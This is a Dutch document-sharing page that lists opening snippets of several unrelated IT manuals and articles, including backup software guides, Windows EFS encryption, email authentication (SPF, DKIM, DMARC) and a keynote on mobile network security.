Installatie Handleiding Extra Werkstation CA3000 Versie 2.9 Postbus 218 5150 AE Drunen Thomas Edisonweg 5 5151 DH Drunen HELPDESK : 0900-27274357 techhelp@aras.nl www.aras.nl Inhoudsopgave 1 Installatieprocedure
Nadere informatieSolution domain. Cloud PC Backup/startkit voor partners. Datum 26/05/2015 Vertrouwelijkheid Unrestricted Onze referentie V1.
Solution domain Cloud PC Backup/startkit voor partners Datum 26/05/2015 Vertrouwelijkheid Unrestricted Onze referentie V1.0 Contact E-mail Inhoudsopgave Inhoudsopgave... 2 1. Hoe inloggen op de Cloud PC
Nadere informatieEncryptie deel III; Windows 2000 EFS
Encryptie deel III; Windows 2000 EFS Auteur Leon Kuunders is als security consultant en managing partner werkzaam bij NedSecure Consulting. E-mail leon.kuunders@nedsecure.nl Inleiding In het eerste artikel
Nadere informatieBSCW-WebDAV Handleiding
BSCW-WebDAV Handleiding Strategische informatievoorziening Februari 2005 versie 2 Gebruik van deze handleiding Deze handleiding is bedoeld om medewerkers en studenten te ondersteunen bij het gebruik van
Nadere informatieMULTIFUNCTIONELE DIGITALE SYSTEMEN. Aanmaken van Templates voor scan-to-file
MULTIFUNCTIONELE DIGITALE SYSTEMEN Aanmaken van Templates voor scan-to-file Templates aanmaken tbv scan-to-file Aanmaken van Scan Templates gaat het eenvoudigst via het webbased beheerprorgramma van de
Nadere informatieHandleiding installatie en gebruik. Ahsay OBM. Windows server Apple OS X Linux en UNIX-varianten
Handleiding installatie en gebruik Ahsay OBM Windows server Apple OS X Linux en UNIX-varianten INHOUD 1 Over deze handleiding 2 Systeemvereisten 3 Installatie 3.1 Linux 3.2 BSD 4 Gebruik via de GUI 5 Helpdeks
Nadere informatieEQ3 Bodygram plus software
EQ3 Bodygram plus software 1. Aanmelden 1.1. Openingsscherm Na installatie van de bodygram plus of na beëindiging van de demolicentie opent Bodygram plus met dit scherm en klik je op Activeer nu! 1.2.
Nadere informatieMS Virtual pc 2007 Handleiding
MS Virtual pc 2007 Handleiding Start de Virtual PC 2007 console en klik op [New...] om een nieuwe virtuele pc aan te maken. De wizzard voor het aanmaken van een nieuwe, virtuele pc start op. New Virtual
Nadere informatieUitleg SPF, DKIM & DMARC
Inleiding E-mail headers SPF DKIM DMARC Hulpmiddelen INLEIDING 70% tot 80% van alle verzonden email is spam E-mail (SMTP) heeft geen enkele ingebouwde beveiliging of validatie van afzender E-mail wordt
Nadere informatieKeynote: Gevaren van zowel het GSM als het Wi-Fi netwerk
Keynote: Gevaren van zowel het GSM als het Wi-Fi netwerk Roel Bierens Pieter Westein Roel Bierens Roel Bierens is een cyber security professional die gespecialiseerd is op het gebied van mobile security
Nadere informatie